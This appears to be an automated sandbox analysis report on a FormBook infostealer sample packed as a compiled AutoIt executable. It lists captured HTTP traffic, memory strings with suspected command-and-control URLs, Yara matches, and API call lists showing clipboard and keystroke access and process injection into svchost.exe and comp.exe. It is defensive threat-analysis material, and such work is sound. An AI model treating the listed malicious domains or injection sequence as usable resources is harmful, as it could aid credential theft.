charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 19:20:17 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 19:21:18 GMTTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t9Bgpnc%2FlV7djegI8pA0r%2Fl%2F9yKnHHT37YHpbIFE8JOFtARDbLk%2BZHsbR9g08FB4gTNnhYnk7l5ilfkTTsHBcBUrct4EpHKG2ABgvUW7B2FxEs3QpLIxyczbLpo3hxt%2FesM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fff077c4d671a48-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1901&min_rtt=1901&rtt_var=950&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1887&delivery_rate=0&cwnd=155&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Source: HMKEBhehjTFHSE.exe, 00000007.00000002.3962348656.0000000005978000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.mffnow.info
Source: HMKEBhehjTFHSE.exe, 00000007.00000002.3962348656.0000000005978000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.mffnow.info/0pqe/
Source: comp.exe, 00000005.00000002.3963109357.00000000074CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: comp.exe, 00000005.00000002.3963109357.00000000074CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: comp.exe, 00000005.00000002.3963109357.00000000074CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: comp.exe, 00000005.00000002.3963109357.00000000074CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: comp.exe, 00000005.00000002.3961674856.0000000003BCA000.00000004.10000000.00040000.00000000.sdmp, HMKEBhehjTFHSE.exe, 00000007.00000002.3961059825.0000000003D6A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
Source: comp.exe, 00000005.00000002.3961674856.0000000003BCA000.00000004.10000000.00040000.00000000.sdmp, HMKEBhehjTFHSE.exe, 00000007.00000002.3961059825.0000000003D6A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
Source: comp.exe, 00000005.00000002.3963109357.00000000074CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: comp.exe, 00000005.00000002.3963109357.00000000074CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: comp.exe, 00000005.00000002.3963109357.00000000074CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: comp.exe, 00000005.00000002.3959858179.00000000004FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: comp.exe, 00000005.00000002.3959858179.00000000004FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: comp.exe, 00000005.00000002.3959858179.00000000004FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: comp.exe, 00000005.00000002.3959858179.00000000004FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: comp.exe, 00000005.00000002.3959858179.00000000004FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: comp.exe, 00000005.00000002.3959858179.00000000004FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: comp.exe, 00000005.00000003.2670087189.00000000074A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: comp.exe, 00000005.00000002.3961674856.0000000003D5C000.00000004.10000000.00040000.00000000.sdmp, comp.exe, 00000005.00000002.3963017142.0000000005A80000.00000004.00000800.00020000.00000000.sdmp, HMKEBhehjTFHSE.exe, 00000007.00000002.3961059825.0000000003EFC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://whois.gandi.net/en/results?search=sunnyz.store
Source: comp.exe, 00000005.00000002.3963109357.00000000074CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: comp.exe, 00000005.00000002.3961674856.0000000003D5C000.00000004.10000000.00040000.00000000.sdmp, comp.exe, 00000005.00000002.3963017142.0000000005A80000.00000004.00000800.00020000.00000000.sdmp, HMKEBhehjTFHSE.exe, 00000007.00000002.3961059825.0000000003EFC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.gandi.net/en/domain
Source: comp.exe, 00000005.00000002.3963109357.00000000074CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: comp.exe, 00000005.00000002.3961674856.0000000003EEE000.00000004.10000000.00040000.00000000.sdmp, HMKEBhehjTFHSE.exe, 00000007.00000002.3961059825.000000000408E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.muasamgiare.click/dc08/?_6yxCX=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgB

Source: C:\Users\user\Desktop\EIvidclKOb.exe

Code function: 0_2_00F74164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00F74164

Source: C:\Users\user\Desktop\EIvidclKOb.exe

Code function: 0_2_00F74164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00F74164

Source: C:\Users\user\Desktop\EIvidclKOb.exe

Code function: 0_2_00F73F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00F73F66

Source: C:\Users\user\Desktop\EIvidclKOb.exe

Code function: 0_2_00F6001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00F6001C

Source: C:\Users\user\Desktop\EIvidclKOb.exe

Code function: 0_2_00F8CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00F8CABC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3960892293.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2482909431.0000000003A40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2482512715.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3960832005.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3959727235.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3962348656.0000000005900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3960869459.0000000002E80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2483416999.0000000004950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00F03B3A
Source: EIvidclKOb.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: EIvidclKOb.exe, 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_999ecafe-6
Source: EIvidclKOb.exe, 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_e8d5c077-4
Source: EIvidclKOb.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_35dc6004-e
Source: EIvidclKOb.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_df72154e-5

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042C643 NtClose,	2_2_0042C643
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72B60 NtClose,LdrInitializeThunk,	2_2_03B72B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03B72DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_03B72C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B735C0 NtCreateMutant,LdrInitializeThunk,	2_2_03B735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B74340 NtSetContextThread,	2_2_03B74340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B74650 NtSuspendThread,	2_2_03B74650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72BA0 NtEnumerateValueKey,	2_2_03B72BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72B80 NtQueryInformationFile,	2_2_03B72B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72BF0 NtAllocateVirtualMemory,	2_2_03B72BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72BE0 NtQueryValueKey,	2_2_03B72BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72AB0 NtWaitForSingleObject,	2_2_03B72AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72AF0 NtWriteFile,	2_2_03B72AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72AD0 NtReadFile,	2_2_03B72AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72FB0 NtResumeThread,	2_2_03B72FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72FA0 NtQuerySection,	2_2_03B72FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72F90 NtProtectVirtualMemory,	2_2_03B72F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72FE0 NtCreateFile,	2_2_03B72FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72F30 NtCreateSection,	2_2_03B72F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72F60 NtCreateProcessEx,	2_2_03B72F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72EA0 NtAdjustPrivilegesToken,	2_2_03B72EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72E80 NtReadVirtualMemory,	2_2_03B72E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72EE0 NtQueueApcThread,	2_2_03B72EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72E30 NtWriteVirtualMemory,	2_2_03B72E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72DB0 NtEnumerateKey,	2_2_03B72DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72DD0 NtDelayExecution,	2_2_03B72DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72D30 NtUnmapViewOfSection,	2_2_03B72D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72D10 NtMapViewOfSection,	2_2_03B72D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72D00 NtSetInformationFile,	2_2_03B72D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72CA0 NtQueryInformationToken,	2_2_03B72CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72CF0 NtOpenProcess,	2_2_03B72CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72CC0 NtQueryVirtualMemory,	2_2_03B72CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72C00 NtQueryInformationProcess,	2_2_03B72C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72C60 NtCreateKey,	2_2_03B72C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B73090 NtSetValueKey,	2_2_03B73090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B73010 NtOpenDirectoryObject,	2_2_03B73010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B739B0 NtGetContextThread,	2_2_03B739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B73D10 NtOpenProcessToken,	2_2_03B73D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B73D70 NtOpenThread,	2_2_03B73D70
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D74340 NtSetContextThread,LdrInitializeThunk,	5_2_02D74340
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D74650 NtSuspendThread,LdrInitializeThunk,	5_2_02D74650
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D72AD0 NtReadFile,LdrInitializeThunk,	5_2_02D72AD0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D72AF0 NtWriteFile,LdrInitializeThunk,	5_2_02D72AF0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D72BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_02D72BF0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D72BE0 NtQueryValueKey,LdrInitializeThunk,	5_2_02D72BE0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D72BA0 NtEnumerateValueKey,LdrInitializeThunk,	5_2_02D72BA0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D72B60 NtClose,LdrInitializeThunk,	5_2_02D72B60
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D72EE0 NtQueueApcThread,LdrInitializeThunk,	5_2_02D72EE0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D72E80 NtReadVirtualMemory,LdrInitializeThunk,	5_2_02D72E80
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D72FE0 NtCreateFile,LdrInitializeThunk,	5_2_02D72FE0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D72FB0 NtResumeThread,LdrInitializeThunk,	5_2_02D72FB0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D72F30 NtCreateSection,LdrInitializeThunk,	5_2_02D72F30
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D72CA0 NtQueryInformationToken,LdrInitializeThunk,	5_2_02D72CA0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D72C70 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_02D72C70
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D72C60 NtCreateKey,LdrInitializeThunk,	5_2_02D72C60
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D72DD0 NtDelayExecution,LdrInitializeThunk,	5_2_02D72DD0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D72DF0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_02D72DF0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D72D10 NtMapViewOfSection,LdrInitializeThunk,	5_2_02D72D10
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D72D30 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_02D72D30
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D735C0 NtCreateMutant,LdrInitializeThunk,	5_2_02D735C0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D739B0 NtGetContextThread,LdrInitializeThunk,	5_2_02D739B0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D72AB0 NtWaitForSingleObject,	5_2_02D72AB0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D72B80 NtQueryInformationFile,	5_2_02D72B80
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D72EA0 NtAdjustPrivilegesToken,	5_2_02D72EA0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D72E30 NtWriteVirtualMemory,	5_2_02D72E30
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D72F90 NtProtectVirtualMemory,	5_2_02D72F90
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D72FA0 NtQuerySection,	5_2_02D72FA0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D72F60 NtCreateProcessEx,	5_2_02D72F60
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D72CC0 NtQueryVirtualMemory,	5_2_02D72CC0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D72CF0 NtOpenProcess,	5_2_02D72CF0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D72C00 NtQueryInformationProcess,	5_2_02D72C00
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D72DB0 NtEnumerateKey,	5_2_02D72DB0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D72D00 NtSetInformationFile,	5_2_02D72D00
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D73090 NtSetValueKey,	5_2_02D73090
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D73010 NtOpenDirectoryObject,	5_2_02D73010
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D73D70 NtOpenThread,	5_2_02D73D70
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D73D10 NtOpenProcessToken,	5_2_02D73D10
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_001D8FF0 NtCreateFile,	5_2_001D8FF0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_001D9160 NtReadFile,	5_2_001D9160
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_001D9250 NtDeleteFile,	5_2_001D9250
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_001D92F0 NtClose,	5_2_001D92F0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_001D9450 NtAllocateVirtualMemory,	5_2_001D9450

Source: C:\Users\user\Desktop\EIvidclKOb.exe

Code function: 0_2_00F6A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_00F6A1EF

Source: C:\Users\user\Desktop\EIvidclKOb.exe

Code function: 0_2_00F58310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00F58310

Source: C:\Users\user\Desktop\EIvidclKOb.exe

Code function: 0_2_00F651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_00F651BD

Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F2D975	0_2_00F2D975
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F221C5	0_2_00F221C5
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F362D2	0_2_00F362D2
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F803DA	0_2_00F803DA
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F3242E	0_2_00F3242E
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F225FA	0_2_00F225FA
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F166E1	0_2_00F166E1
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F0E6A0	0_2_00F0E6A0
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F5E616	0_2_00F5E616
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F3878F	0_2_00F3878F
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F68889	0_2_00F68889
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F80857	0_2_00F80857
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F36844	0_2_00F36844
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F18808	0_2_00F18808
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F2CB21	0_2_00F2CB21
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F36DB6	0_2_00F36DB6
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F16F9E	0_2_00F16F9E
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F13030	0_2_00F13030
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F2F1D9	0_2_00F2F1D9
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F23187	0_2_00F23187
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F01287	0_2_00F01287
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F21484	0_2_00F21484
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F15520	0_2_00F15520
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F27696	0_2_00F27696
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F15760	0_2_00F15760
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F21978	0_2_00F21978
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F39AB5	0_2_00F39AB5
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F0FCE0	0_2_00F0FCE0
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F87DDB	0_2_00F87DDB
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F2BDA6	0_2_00F2BDA6
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F21D90	0_2_00F21D90
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F13FE0	0_2_00F13FE0
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F0DF00	0_2_00F0DF00
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_01948FB8	0_2_01948FB8
